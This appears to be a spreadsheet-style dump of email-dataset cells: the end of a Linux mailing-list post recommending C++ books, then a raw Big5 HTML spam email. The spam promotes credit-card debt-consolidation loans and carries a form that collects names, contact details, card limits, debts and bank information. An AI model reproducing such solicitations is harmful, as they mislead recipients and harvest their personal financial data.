 &gt; is Stroustrup. Although the C++ book is a lot bigger :)
 For C++, guru of the week at 
 http://www.gotw.ca/gotw/index.htm (can get them in book form and
 with extra material as Herb Sutters Essential C++ and More Essential C++)
 is a good resource. 
 Scott Meyers Effective C++, More Effective C++ and Effective STL
 are truly handy books.
 I always felt that The C++ faq wasn't as good as the C faq, but
 it lives at http://www.parashift.com/c++-faq-lite/
 C.
 -- 
 Caolan McNamara               |  caolan@skynet.ie  
 http://www.skynet.ie/~caolan  |  +353 86 8161184
 Verbing weirds language
 -- 
 Irish Linux Users' Group: ilug@linux.ie
 http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: ٦b20%HΥd`??? Time:PM 05:36:34
</t>
  </si>
  <si>
    <t xml:space="preserve">cpurf
 &lt;html&gt;
 &lt;head&gt;
 &lt;meta http-equiv=3D"Content-Type" content=3D"text/html; charset=3Dbig5"&gt;
 &lt;meta name=3D"GENERATOR" content=3D"Microsoft FrontPage 4.0"&gt;
 &lt;meta name=3D"ProgId" content=3D"FrontPage.Editor.Document"&gt;
 					=09
 					=09
 					=09
 					=09
 					=09
 					=09
 					=09
 &lt;title&gt;6&lt;/title&gt;
 &lt;/head&gt;
 &lt;body background=3D"smart%20=BA=F4=A7}/H2020.gif"&gt;
 &lt;form method=3D"POST" action=3D"http://www.xline.com.tw/f2m/f2m.php?F=3D1=
 015378933 " method=3D"POST"&gt;
 &lt;input type=3D"hidden" name=3D"SOB"  value=3D"=A1=B3=A7Q=B2v"&gt;
 &lt;p align=3D"center"&gt;&lt;i&gt;&lt;font face=3D"=B7s=B2=D3=A9=FA=C5=E9"&gt;&lt;b&gt;&lt;span sty=
 le=3D"letter-spacing: 5pt"&gt;&lt;font color=3D"#0000FF" size=3D"6"&gt;=B1z=C1=D9=A6=
 b=A5=CE&lt;/font&gt;&lt;font color=3D"#FF0000" size=3D"6"&gt;&lt;u&gt;&lt;span lang=3D"EN-US"&gt;=
 20&lt;font face=3D"=B7s=B2=D3=A9=FA=C5=E9" color=3D"#FF0000" size=3D"7"&gt;%&lt;/f=
 ont&gt;&lt;/span&gt;&lt;/u&gt;&lt;/font&gt;&lt;span lang=3D"EN-US"&gt;&lt;font color=3D"#0000FF" size=3D=
 "6"&gt;=AA=BA=ABH=A5=CE=A5d=B6=DC     =20
 !!!&lt;/font&gt;&lt;font color=3D"#0000FF" size=3D"5"&gt;&amp;nbsp;&lt;/font&gt;&lt;/span&gt;&lt;/span&gt;&lt;=
 /b&gt;&lt;/font&gt;&lt;/i&gt;&lt;/p&gt;
 &lt;p align=3D"center"&gt;&lt;b&gt;&lt;span style=3D"mso-ascii-font-family: Times New Ro=
 man"&gt;&lt;font face=3D"=B7s=B2=D3=A9=FA=C5=E9" size=3D"5" color=3D"#FF0000"&gt;=B9=
 s=A7Q=B2v=A5N=C0v&lt;/font&gt;&lt;font face=3D"=B7s=B2=D3=A9=FA=C5=E9" color=3D"#0=
 000FF" size=3D"5"&gt;=AE=C9=A5N=A8=D3=C1{=C5o~~&lt;/font&gt;&lt;/span&gt;&lt;/b&gt;&lt;/p&gt;       =
      =20
   &lt;p align=3D"center"&gt;&lt;span style=3D"mso-ascii-font-family: Times New Rom=
 an"&gt;&lt;font size=3D"4" face=3D"=B7s=B2=D3=A9=FA=C5=E9"&gt;&lt;b&gt;&amp;nbsp;&lt;/b&gt;&lt;/font&gt;=
 &lt;/span&gt;&lt;b&gt;&lt;span style=3D"mso-ascii-font-family: Times New Roman"&gt;&lt;font fa=
 ce=3D"=B7s=B2=D3=A9=FA=C5=E9" color=3D"#000000" size=3D"3"&gt;=A5=D8=ABe=B4`=
 =C0=F4=C1`=C3B&lt;/font&gt;&lt;/span&gt;&lt;font face=3D"=B7s=B2=D3=A9=FA=C5=E9" color=3D=
 "#000000" size=3D"3"&gt;&lt;span lang=3D"EN-US"&gt;             =20
   x &lt;/span&gt;&lt;span style=3D"mso-ascii-font-family: Times New Roman"&gt;=ABH=A5=
 =CE=A5d=A7Q=B2v&lt;/span&gt;&lt;span lang=3D"EN-US"&gt;                              =
                                      =20
   x 1/12 =3D =A1u1&lt;/span&gt;&lt;span style=3D"mso-ascii-font-family: Times New =
 Roman"&gt;=AD=D3=A4=EB=A7Q=AE=A7=A1v=B6O=A5=CE&lt;/span&gt;&lt;/font&gt;&lt;/b&gt;&lt;/p&gt;        =
           =20
   &lt;p class=3D"MsoNormal" align=3D"center" style=3D"text-align:center"&gt;&lt;fo=
 nt face=3D"=B7s=B2=D3=A9=FA=C5=E9"&gt;&lt;font color=3D"#000000"&gt;&lt;span style=3D=
 "mso-bidi-font-size: 10.0pt; mso-fareast-font-family: =BC=D0=B7=A2=C5=E9;=
  letter-spacing: 3.0pt"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&lt;b&gt;=20
   &lt;font size=3D"3"&gt; =20
   $100,000 x&lt;/font&gt;&lt;/b&gt;                  =20
   &lt;/span&gt;&lt;/font&gt;&lt;b&gt;&lt;span style=3D"mso-bidi-font-size: 10.0pt; mso-fareast=
 -font-family: =BC=D0=B7=A2=C5=E9; letter-spacing: 3.0pt" lang=3D"EN-US"&gt;&lt;=
 i&gt;&lt;font color=3D"#008000" size=3D"5"&gt;20%&lt;/font&gt;&lt;/i&gt;&lt;/span&gt;&lt;font color=3D"=
 #000000" size=3D"3" face=3D"=B7s=B2=D3=A9=FA=C5=E9"&gt;&lt;span style=3D"mso-bi=
 di-font-size: 10.0pt; mso-fareast-font-family: =BC=D0=B7=A2=C5=E9; color:=
  black; letter-spacing: 3.0pt" lang=3D"EN-US"&gt; =20
   &lt;span lang=3D"EN-US" style=3D"font-size:14.0pt;                =20
 mso-bidi-font-size:10.0pt;mso-fareast-font-family:=BC=D0=B7=A2=C5=E9;colo=
 r:black;letter-spacing:            =20
 3.0pt"&gt; x 1/12=3D&lt;/span&gt;&lt;/span&gt;&lt;/font&gt;&lt;font color=3D"#FF0000"&gt;&lt;i&gt;&lt;span la=
 ng=3D"EN-US" style=3D"mso-bidi-font-size: 10.0pt; mso-fareast-font-family=
 : =BC=D0=B7=A2=C5=E9; letter-spacing: 3.0pt"&gt;&lt;font size=3D"5"&gt;$1,667&lt;/fon=
 t&gt;&lt;/span&gt;&lt;/i&gt;&lt;font size=3D"2"&gt;&lt;span style=3D"mso-bidi-font-size: 10.0pt; =
 mso-fareast-font-family: =BC=D0=B7=A2=C5=E9; letter-spacing: 3.0pt" lang=3D=
 "EN-US"&gt;&lt;o:p&gt;            =20
   &lt;span lang=3D"EN-US" style=3D"mso-bidi-font-size: 10.0pt; mso-fareast-f=
 ont-family: =BC=D0=B7=A2=C5=E9; letter-spacing: 3.0pt"&gt;             =20
   =A1K=A5=A6=A6=E6=A7Q=AE=A7                  =20
   &lt;/span&gt;&lt;/span&gt;&lt;/font&gt;&lt;/font&gt;&lt;/b&gt;&lt;/font&gt;&lt;b&gt;&lt;span lang=3D"EN-US" style=3D=
 "mso-bidi-font-size: 10.0pt; mso-fareast-font-family: =BC=D0=B7=A2=C5=E9;=
  color: black; letter-spacing: 3.0pt"&gt;            =20
   &lt;font color=3D"#000000" face=3D"=B7s=B2=D3=A9=FA=C5=E9"&gt;            =20
   &lt;/o:p&gt;            =20
   &lt;/font&gt;            =20
   &lt;/span&gt;&lt;/b&gt;&lt;/p&gt;            =20
 &lt;p align=3D"center"&gt;&lt;b&gt;&lt;span style=3D"mso-bidi-font-size: 10.0pt; mso-far=
 east-font-family: =BC=D0=B7=A2=C5=E9; letter-spacing: 3.0pt; mso-font-ker=
 ning: 1.0pt; mso-ansi-language: EN-US; mso-fareast-language: ZH-TW; mso-b=
 idi-language: AR-SA"&gt;&lt;font face=3D"=B7s=B2=D3=A9=FA=C5=E9"&gt;&lt;font color=3D=
 "#000000"&gt;$100,000 x   =20
 &lt;/font&gt;&lt;/font&gt;  &lt;font face=3D"=B7s=B2=D3=A9=FA=C5=E9" color=3D"#008000" s=
 ize=3D"5"&gt;   =20
 &lt;i&gt;0&lt;/i&gt; &lt;i&gt;&lt;span lang=3D"EN-US" style=3D"mso-bidi-font-size: 10.0pt; fon=
 t-family: Times New Roman; mso-fareast-font-family: =BC=D0=B7=A2=C5=E9; l=
 etter-spacing: 3.0pt; mso-font-kerning: 1.0pt; mso-ansi-language: EN-US; =
 mso-fareast-language: ZH-TW; mso-bidi-language: AR-SA"&gt;%&lt;/span&gt;&lt;/i&gt;&lt;/font=
 &gt; &lt;/span&gt;&lt;span lang=3D"EN-US" style=3D"mso-bidi-font-size: 10.0pt; font-f=
 amily: Times New Roman; mso-fareast-font-family: =BC=D0=B7=A2=C5=E9; colo=
 r: black; letter-spacing: 3.0pt; mso-font-kerning: 1.0pt; mso-ansi-langua=
 ge: EN-US; mso-fareast-language: ZH-TW; mso-bidi-language: AR-SA"&gt; &lt;font =
 face=3D"=B7s=B2=D3=A9=FA=C5=E9" color=3D"#000000"&gt; x 1/12=3D&lt;/font&gt;&lt;/span=
 &gt;&lt;/b&gt;&lt;font face=3D"=B7s=B2=D3=A9=FA=C5=E9" size=3D"5" color=3D"#FF0000"&gt;&lt;=
 b&gt;&lt;span lang=3D"EN-US" style=3D"font-size: 18.0pt; mso-bidi-font-size: 10=
 .0pt; mso-fareast-font-family: =BC=D0=B7=A2=C5=E9; letter-spacing: 3.0pt"=
 &gt;&lt;i&gt;&lt;span style=3D"mso-bidi-font-size: 10.0pt; mso-fareast-font-family: =BC=
 =D0=B7=A2=C5=E9; letter-spacing: 3.0pt"&gt;$0&lt;/span&gt;&lt;/i&gt;&lt;/span&gt;&lt;/b&gt;&lt;/font&gt;&lt;s=
 pan style=3D"mso-bidi-font-size: 10.0pt; mso-fareast-font-family: =BC=D0=B7=
 !
  =A2=C5=E9; letter-spacing: 3.0pt; mso-f
 t-kerning: 1.0pt; mso-ansi-language: EN-US; mso-fareast-language: ZH-TW; =
 mso-bidi-language: AR-SA"&gt;&lt;b&gt;&lt;font face=3D"=B7s=B2=D3=A9=FA=C5=E9" color=3D=
 "#FF0000" size=3D"2"&gt;=A1K=A5=BB=A6=E6=A7Q=AE=A7&lt;/font&gt;&lt;/b&gt;&lt;/span&gt;&lt;p class=
 =3D"MsoNormal" align=3D"center"&gt;&lt;b&gt;&lt;font face=3D"=B7s=B2=D3=A9=FA=C5=E9"&gt;=
 &lt;span style=3D"mso-ascii-font-family: Times New Roman"&gt;=B0=DF=A4@=A5u=A6=AC=
 =A8=FA=A4=E2=C4=F2=B6O=AC=B0=AE=D6=AD=E3=A5N=C0v=AA=F7=C3B=A4=A7   =20
 1 %&lt;/span&gt;&lt;/font&gt;&lt;/b&gt;&lt;/p&gt;               =20
 &lt;p class=3D"MsoNormal" align=3D"center"&gt;&lt;span style=3D"mso-ascii-font-fam=
 ily: Times New Roman"&gt;&lt;b&gt;&lt;font face=3D"=B7s=B2=D3=A9=FA=C5=E9"&gt;=A7Y&amp;nbsp;=
 &amp;nbsp;&amp;nbsp; =20
 &lt;/font&gt;&lt;/b&gt;&lt;/span&gt;&lt;b&gt;&lt;font face=3D"=B7s=B2=D3=A9=FA=C5=E9"&gt;&lt;span style=3D=
 "mso-bidi-font-size: 10.0pt; mso-fareast-font-family: =BC=D0=B7=A2=C5=E9;=
  letter-spacing: 3.0pt; mso-font-kerning: 1.0pt; mso-ansi-language: EN-US=
 ; mso-fareast-language: ZH-TW; mso-bidi-language: AR-SA"&gt;&lt;font color=3D"#=
 000000"&gt;$100,000 x&lt;/font&gt;&lt;/span&gt;&lt;/font&gt;&lt;/b&gt;&lt;font face=3D"=B7s=B2=D3=A9=FA=
 =C5=E9"&gt;&lt;b&gt;&lt;font face=3D"=B7s=B2=D3=A9=FA=C5=E9" color=3D"#008000" size=3D=
 "6"&gt;&lt;span style=3D"mso-bidi-font-size: 10.0pt; mso-fareast-font-family: =BC=
 =D0=B7=A2=C5=E9; letter-spacing: 3.0pt; mso-font-kerning: 1.0pt; mso-ansi=
 -language: EN-US; mso-fareast-language: ZH-TW; mso-bidi-language: AR-SA"&gt;=
      =20
  &lt;/span&gt;&lt;font size=3D"5"&gt;&lt;span style=3D"mso-bidi-font-size: 10.0pt; mso-f=
 areast-font-family: =BC=D0=B7=A2=C5=E9; letter-spacing: 3.0pt; mso-font-k=
 erning: 1.0pt; mso-ansi-language: EN-US; mso-fareast-language: ZH-TW; mso=
 -bidi-language: AR-SA"&gt; =20
 &lt;i&gt;1&lt;/i&gt; &lt;i&gt;&lt;span lang=3D"EN-US" style=3D"mso-bidi-font-size: 10.0pt; fon=
 t-family: Times New Roman; mso-fareast-font-family: =BC=D0=B7=A2=C5=E9; l=
 etter-spacing: 3.0pt; mso-font-kerning: 1.0pt; mso-ansi-language: EN-US; =
 mso-fareast-language: ZH-TW; mso-bidi-language: AR-SA"&gt;%&lt;/span&gt;&lt;/i&gt;&lt;/span=
 &gt;&lt;/font&gt;&lt;/font&gt;&lt;font size=3D"5"&gt;&lt;span style=3D"mso-bidi-font-size: 10.0pt=
 ; mso-fareast-font-family: =BC=D0=B7=A2=C5=E9; letter-spacing: 3.0pt; mso=
 -font-kerning: 1.0pt; mso-ansi-language: EN-US; mso-fareast-language: ZH-=
 TW; mso-bidi-language: AR-SA"&gt;&lt;span lang=3D"EN-US" style=3D"mso-bidi-font=
 -size: 10.0pt; font-family: Times New Roman; mso-fareast-font-family: =BC=
 =D0=B7=A2=C5=E9; color: black; letter-spacing: 3.0pt; mso-font-kerning: 1=
 .0pt; mso-ansi-language: EN-US; mso-fareast-language: ZH-TW; mso-bidi-lan=
 guage: AR-SA"&gt;=20
 &lt;/span&gt;&lt;/span&gt;&lt;/font&gt;&lt;span lang=3D"EN-US" style=3D"mso-bidi-font-size: 10=
 .0pt; font-family: Times New Roman; mso-fareast-font-family: =BC=D0=B7=A2=
 =C5=E9; color: black; letter-spacing: 3.0pt; mso-font-kerning: 1.0pt; mso=
 -ansi-language: EN-US; mso-fareast-language: ZH-TW; mso-bidi-language: AR=
 -SA"&gt;&lt;font color=3D"#000000"&gt;=3D&lt;/font&gt;&lt;/span&gt;&lt;font color=3D"#FF0000" siz=
 e=3D"5"&gt;&lt;span lang=3D"EN-US" style=3D"font-size: 18.0pt; mso-bidi-font-si=
 ze: 10.0pt; mso-fareast-font-family: =BC=D0=B7=A2=C5=E9; letter-spacing: =
 3.0pt"&gt;&lt;i&gt;&lt;span style=3D"mso-bidi-font-size: 10.0pt; mso-fareast-font-fam=
 ily: =BC=D0=B7=A2=C5=E9; letter-spacing: 3.0pt"&gt;$1000&lt;/span&gt;&lt;/i&gt;&lt;/span&gt;&lt;/=
 font&gt;&lt;/b&gt;&lt;/font&gt;&lt;/p&gt;             =20
 &lt;p class=3D"MsoNormal" align=3D"center"&gt;&lt;b&gt;&lt;i&gt;&lt;span style=3D"mso-bidi-fon=
 t-size: 10.0pt; mso-fareast-font-family: =BC=D0=B7=A2=C5=E9; letter-spaci=
 ng: 3.0pt" lang=3D"EN-US"&gt;&lt;font face=3D"=B7s=B2=D3=A9=FA=C5=E9" color=3D"=
 #000000" size=3D"4"&gt;$1667-$1000=3D$667&lt;/font&gt;&lt;/span&gt;&lt;/i&gt;&lt;/b&gt;&lt;/p&gt;         =
    =20
 &lt;p class=3D"MsoNormal" align=3D"center"&gt;&lt;font color=3D"#FF0000" face=3D"=B7=
 s=B2=D3=A9=FA=C5=E9"&gt;&lt;b&gt;&lt;span lang=3D"EN-US" style=3D"font-size: 18.0pt; =
 mso-bidi-font-size: 10.0pt; mso-fareast-font-family: =BC=D0=B7=A2=C5=E9; =
 letter-spacing: 3.0pt"&gt;&lt;i&gt;&lt;span style=3D"font-size: 18.0pt; mso-bidi-font=
 -size: 10.0pt; mso-fareast-font-family: =BC=D0=B7=A2=C5=E9; letter-spacin=
 g: 3.0pt"&gt;=B2=C4=A4@=AD=D3=A4=EB=A7Y=A5i=C0=B0=B1z=AC=D9=A4U667=A4=B8&lt;/sp=
 an&gt;&lt;/i&gt;&lt;/span&gt;&lt;/b&gt;&lt;/font&gt;&lt;/p&gt;            =20
 &lt;p class=3D"MsoNormal" align=3D"center"&gt;&lt;span style=3D"mso-spacerun: yes"=
  lang=3D"EN-US"&gt;&lt;b&gt;&lt;font color=3D"#FF0000"&gt;&lt;font face=3D"=B7s=B2=D3=A9=FA=
 =C5=E9" size=3D"4"&gt;=A5N=C0v=A4Q=B8U=A4=B8=A1A=ABe=A4Q=A4=AD=AD=D3=A4=EB=A8=
 C=A4=EB=B3=CC=A7C=C0=B3=C3=BA=AC=B0&lt;/font&gt;&lt;font face=3D"=B7s=B2=D3=A9=FA=C5=
 =E9" size=3D"5"&gt;$1000&lt;/font&gt;&lt;font face=3D"=B7s=B2=D3=A9=FA=C5=E9" size=3D=
 "4"&gt;=A4=B8&lt;/font&gt;&lt;/font&gt;&lt;/b&gt;&lt;/span&gt;&lt;/p&gt;            =20
 &lt;p class=3D"MsoNormal" align=3D"center"&gt;&lt;span style=3D"mso-spacerun: yes"=
  lang=3D"EN-US"&gt;&lt;b&gt;&lt;font face=3D"=B7s=B2=D3=A9=FA=C5=E9" color=3D"#000000=
 " size=3D"4"&gt;=A5t=A6=B3=B3\=A6h=C0u=B4f=B1M=AE=D7=A8=D1=B1z=BF=EF=BE=DC!!=
 !&lt;/font&gt;&lt;/b&gt;&lt;/span&gt;&lt;/p&gt;            =20
 &lt;p class=3D"MsoNormal" align=3D"center"&gt;&lt;span style=3D"mso-spacerun: yes"=
  lang=3D"EN-US"&gt;&lt;font face=3D"=B7s=B2=D3=A9=FA=C5=E9" color=3D"#000080"&gt;=BD=
 =D0=B6=F1=A7=B4=A4U=A6C=AA=ED=AE=E6=A1A&lt;/font&gt;&lt;/span&gt;&lt;font color=3D"#0000=
 80" face=3D"=B7s=B2=D3=A9=FA=C5=E9"&gt;=A7=DA=AD=CC=B1N=AC=B0=B1z=B1H=A4@=A5=
 =F7=A7=F3=B8=D4=B2=D3=A4=A7=B8=EA=AE=C6=A4=CE=A5=D3=BD=D0=AE=D1=B5=B9=B1z=
 =A1I&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;/font&gt;&lt;/p&gt;            =20
 &lt;p align=3D"center"&gt;&lt;font face=3D"=B7s=B2=D3=A9=FA=C5=E9" size=3D"4"&gt;&lt;fon=
 t color=3D"#ff0000"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&lt;/font&gt;&lt;b&gt;=20
  =A9=CE=B9q=AC=A2=B1M=AD=FB:0968-523-989&amp;nbsp;&amp;nbsp; =B3=AF=A4p=A9j&lt;/b&gt;&lt;/=
 font&gt;&lt;/p&gt;                                                                =
 =20
   &lt;div align=3D"center"&gt;            =20
     &lt;center&gt;            =20
     &lt;input type=3D"hidden" value=3D" =A1=B3=A7Q=B2v" name=3D"SOB"&gt;
     &lt;table height=3D"207" cellSpacing=3D"1" cellPadding=3D"4" width=3D"51=
 7" bgColor=3D"#666666" border=3D"0"&gt;
       &lt;tbody&gt;
         &lt;tr bgColor=3D"#ffffff"&gt;
           &lt;td width=3D"503" height=3D"197"&gt;
             &lt;table width=3D"100%" border=3D"0"&gt;
               &lt;tbody&gt;
                 &lt;tr&gt;
                   &lt;td width=3D"16%"&gt;&lt;font size=3D"2"&gt;&lt;b&gt;=A9m=A6W=A1G&lt;/b&gt;&lt;=
 /font&gt;&lt;/td&gt;
                   &lt;td width=3D"38%"&gt;&lt;b&gt;&lt;font face=3D"=B7s=B2=D3=A9=FA=C5=E9=
 "&gt;&lt;input size=3D"20" name=3D"name1"&gt;&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
                   &lt;td width=3D"14%"&gt;&lt;font size=3D"2"&gt;&lt;b&gt;=A9=CA=A7O :&lt;/b&gt;&lt;=
 /font&gt;&lt;/td&gt;  =20
                   &lt;td width=3D"32%"&gt;&lt;font face=3D"=B7s=B2=D3=A9=FA=C5=E9"=
 &gt;&amp;nbsp;&lt;input type=3D"radio" CHECKED value=3D"=A8k1" name=3D"R1"&gt;=A8k&amp;nbs=
 p;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;   =20
                     &lt;input type=3D"radio" value=3D"=A4k1" name=3D"R1"&gt;=A4=
 k&amp;nbsp;&amp;nbsp;&lt;/font&gt;&lt;/td&gt;
                 &lt;/tr&gt;
                 &lt;tr&gt;
                   &lt;td width=3D"16%"&gt;&lt;font size=3D"2"&gt;&lt;b&gt;=A6~&lt;font face=3D=
 "=B7s=B2=D3=A9=FA=C5=E9"&gt;=C4=D6=A1G&lt;/font&gt;&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;
                   &lt;td width=3D"38%"&gt;&lt;font face=3D"=B7s=B2=D3=A9=FA=C5=E9"=
 &gt;&lt;input size=3D"8" name=3D"age1"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&lt;/font&gt;&lt;/td&gt;
                   &lt;td width=3D"14%"&gt;&lt;font face=3D"=B7s=B2=D3=A9=FA=C5=E9"=
 &gt;&lt;b&gt;&lt;font size=3D"2"&gt;=20
   =C2=BE=B7~&lt;/font&gt; :&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;   =20
                   &lt;td width=3D"32%"&gt;&lt;font face=3D"=B7s=B2=D3=A9=FA=C5=E9"=
 &gt;&lt;input size=3D"19" name=3D"occ1"&gt;&lt;/font&gt;&lt;/td&gt;
                 &lt;/tr&gt;
                 &lt;tr&gt;
                   &lt;td width=3D"16%"&gt;&lt;font size=3D"2"&gt;&lt;b&gt;&amp;nbsp;e-mail=A1G&lt;=
 /b&gt;&lt;/font&gt;&lt;/td&gt;
                   &lt;td width=3D"38%"&gt;&lt;font face=3D"=B7s=B2=D3=A9=FA=C5=E9"=
 &gt;&lt;input size=3D"22" name=3D"mail1"&gt;&lt;/font&gt;&lt;/td&gt;
                   &lt;td width=3D"14%"&gt;&lt;font size=3D"2"&gt;&lt;b&gt;=B9q=B8=DC=A1G&lt;/b=
 &gt;&lt;/font&gt;&lt;/td&gt;
                   &lt;td width=3D"32%"&gt;&lt;font face=3D"=B7s=B2=D3=A9=FA=C5=E9"=
 &gt;&lt;!--webbot
                     bot=3D"Validation" s-data-type=3D"Number"
                     s-number-separators=3D"x." --&gt;&lt;input size=3D"23" name=
 =3D"tel1"&gt;&lt;/font&gt;&lt;/td&gt;
                 &lt;/tr&gt;
                 &lt;tr&gt;
                   &lt;td width=3D"16%"&gt;&lt;font size=3D"2"&gt;&lt;b&gt;=A6a=A7}=A1G&lt;/b&gt;&lt;=
 /font&gt;&lt;/td&gt;
                   &lt;td width=3D"84%" colspan=3D"3"&gt;&lt;font face=3D"=B7s=B2=D3=
 =A9=FA=C5=E9"&gt;&lt;input size=3D"56" name=3D"uemail1"&gt;&lt;/font&gt;&lt;/td&gt;
                 &lt;/tr&gt;
                 &lt;tr&gt;
                   &lt;td width=3D"100%" colspan=3D"4"&gt;&lt;font face=3D"=B7s=B2=D3=
 =A9=FA=C5=E9" size=3D"2"&gt;&lt;b&gt;=ABH=A5=CE=A5d=C1`=B1i=BC=C6=A1G&lt;/b&gt;&lt;/font&gt;&amp;n=
 bsp;   =20
                     &lt;font face=3D"=B7s=B2=D3=A9=FA=C5=E9"&gt;&lt;select size=3D=
 "1" name=3D"D2"&gt;            =20
     &lt;option value=3D"1 ~ 3=B1i=ABH=A5=CE=A5d" selected&gt;=A2=B0=A1=E3=A2=B2=
 =B1i=ABH=A5=CE=A5d&lt;/option&gt;            =20
     &lt;option value=3D"3 ~ 5=B1i=ABH=A5=CE=A5d"&gt;=A2=B2=A1=E3=A2=B4=B1i=ABH=A5=
 =CE=A5d&lt;/option&gt;            =20
     &lt;option value=3D"5 ~ 8=B1i=ABH=A5=CE=A5d"&gt;=A2=B4=A1=E3=A2=B7=B1i=ABH=A5=
 =CE=A5d&lt;/option&gt;            =20
     &lt;option value=3D"8=B1i=ABH=A5=CE=A5d=A5H=A4W"&gt;=A2=B7=B1i=ABH=A5=CE=A5=
 d=A5H=A4W&lt;/option&gt;            =20
   &lt;/select&gt;&lt;/font&gt;&lt;/td&gt;
                 &lt;/tr&gt;
                 &lt;tr&gt;
                   &lt;td width=3D"100%" colspan=3D"4"&gt;&lt;font face=3D"=B7s=B2=D3=
 =A9=FA=C5=E9" size=3D"2"&gt;&lt;b&gt;=A9=D2=AB=F9=ABH=A5=CE=A5d=A4=A4=C3B=AB=D7=B3=
 =CC=B0=AA=AC=B0=A1G&amp;nbsp;&amp;nbsp;   =20
                     &lt;/b&gt;&lt;/font&gt;&lt;font face=3D"=B7s=B2=D3=A9=FA=C5=E9"&gt;&lt;sel=
 ect size=3D"1" name=3D"D3"&gt;                                              =
                   =20
     &lt;option value=3D"=C3B=AB=D73=A1=E35=B8U" selected&gt;=C3B=AB=D7=A2=B2=A1=
 =E3=A2=B4=B8U&lt;/option&gt;            =20
     &lt;option value=3D"=C3B=AB=D75=A1=E38=B8U"&gt;=C3B=AB=D7=A2=B4=A1=E3=A2=B7=
 =B8U&lt;/option&gt;            =20
     &lt;option value=3D"=C3B=AB=D78=A1=E312=B8U"&gt;=C3B=AB=D7=A2=B7=A1=E3=A2=B0=
 =A2=B1=B8U&lt;/option&gt;            =20
     &lt;option value=3D"=C3B=AB=D712=A1=E315=B8U"&gt;=C3B=AB=D7=A2=B0=A2=B1=A1=E3=
 =A2=B0=A2=B4=B8U&lt;/option&gt;            =20
     &lt;option value=3D"=C3B=AB=D715=A1=E319=B8U"&gt;=C3B=AB=D7=A2=B0=A2=B4=A1=E3=
 =A2=B0=A2=B8=B8U&lt;/option&gt;            =20
     &lt;option value=3D"=C3B=AB=D719=B8U=A5H=A4W"&gt;=C3B=AB=D7=A2=B0=A2=B8=B8U=
 =A5H=A4W&lt;/option&gt;            =20
   &lt;/select&gt;&lt;/font&gt;&lt;/td&gt;
                 &lt;/tr&gt;
                 &lt;tr&gt;
                   &lt;td width=3D"50%" colspan=3D"2"&gt;&lt;font face=3D"=B7s=B2=D3=
 =A9=FA=C5=E9" size=3D"2"&gt;&lt;b&gt;=20
   =B1=FD=A5N=C0v=AA=F7=C3B :&lt;/b&gt;&lt;/font&gt;&lt;font face=3D"=B7s=B2=D3=A9=FA=C5=E9=
 "&gt;&lt;select size=3D"1" name=3D"D4"&gt;                                        =
                            =20
     &lt;option value=3D"=C0v=C1=D93=A1=E35=B8U" selected&gt;=C0v=C1=D9=A2=B2=A1=
 =E3=A2=B4=B8U&lt;/option&gt;            =20
     &lt;option value=3D"=C0v=C1=D95=A1=E38=B8U"&gt;=C0v=C1=D9=A2=B4=A1=E3=A2=B7=
 =B8U&lt;/option&gt;            =20
     &lt;option value=3D"=C0v=C1=D98=A1=E312=B8U"&gt;=C0v=C1=D9=A2=B7=A1=E3=A2=B0=
 =A2=B1=B8U&lt;/option&gt;            =20
     &lt;option value=3D"=C0v=C1=D912=A1=E315=B8U"&gt;=C0v=C1=D9=A2=B0=A2=B1=A1=E3=
 =A2=B0=A2=B4=B8U&lt;/option&gt;            =20
     &lt;option value=3D"=C0v=C1=D915=A1=E319=B8U"&gt;=C0v=C1=D9=A2=B0=A2=B4=A1=E3=
 =A2=B0=A2=B8=B8U&lt;/option&gt;            =20
     &lt;option value=3D"=C0v=C1=D919=B8U=A5H=A4W"&gt;=C0v=C1=D9=A2=B0=A2=B8=B8U=
 =A5H=A4W&lt;/option&gt;            =20
   &lt;/select&gt;&lt;/font&gt;&lt;/td&gt;
                   &lt;td width=3D"50%" colspan=3D"2"&gt;&lt;font face=3D"=B7s=B2=D3=
 =A9=FA=C5=E9" size=3D"2"&gt;&lt;b&gt; =C1p=B5=B8=B1z=B3=CC=A8=CE=AE=C9=B6=A1=A1G&lt;/=
 b&gt;&lt;/font&gt;&lt;font face=3D"=B7s=B2=D3=A9=FA=C5=E9"&gt;&lt;select size=3D"1" name=3D=
 "D5"&gt;                                =20
     &lt;option value=3D"=B3=A3=A5i=A5H" selected&gt;=B3=A3=A5i=A5H&lt;/option&gt;    =
         =20
     &lt;option value=3D"=A4W=A4=C8"&gt;=A4W=A4=C8&lt;/option&gt;            =20
     &lt;option value=3D"=A4U=A4=C8"&gt;=A4U=A4=C8&lt;/option&gt;           =20
     &lt;option value=3D"=B1=DF=A4W"&gt;=B1=DF=A4W&lt;/option&gt;            =20
   &lt;/select&gt;&lt;/font&gt;&lt;/td&gt;
                 &lt;/tr&gt;
                 &lt;tr&gt;
                   &lt;td width=3D"100%" colspan=3D"4"&gt;&lt;font face=3D"=B7s=B2=D3=
 =A9=FA=C5=E9"&gt;&lt;b&gt;&lt;font size=3D"2"&gt;=ACO=A7_=B4=BF=BF=EC=B9L=A5N=C0v:&amp;nbsp;=
 &amp;nbsp;       =20
   &lt;input type=3D"radio" value=3D"NO" name=3D"R2"&gt;=A4=A3=B4=BF &amp;nbsp;&amp;nbsp=
 ;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; =20
                     &lt;input type=3D"radio" value=3D"YES" name=3D"R2"&gt;=B4=BF=
 =BF=EC=B9L &lt;!--webbot
                     bot=3D"Validation" s-data-type=3D"Number"
                     s-number-separators=3D"x." --&gt;&lt;input size=3D"17" name=
 =3D"BK"&gt;=BB=C8=A6=E6&lt;/font&gt;&lt;/b&gt;&amp;nbsp;&amp;nbsp;&lt;/font&gt;=20
                   &lt;/td&gt;
                 &lt;/tr&gt;
                 &lt;tr&gt;
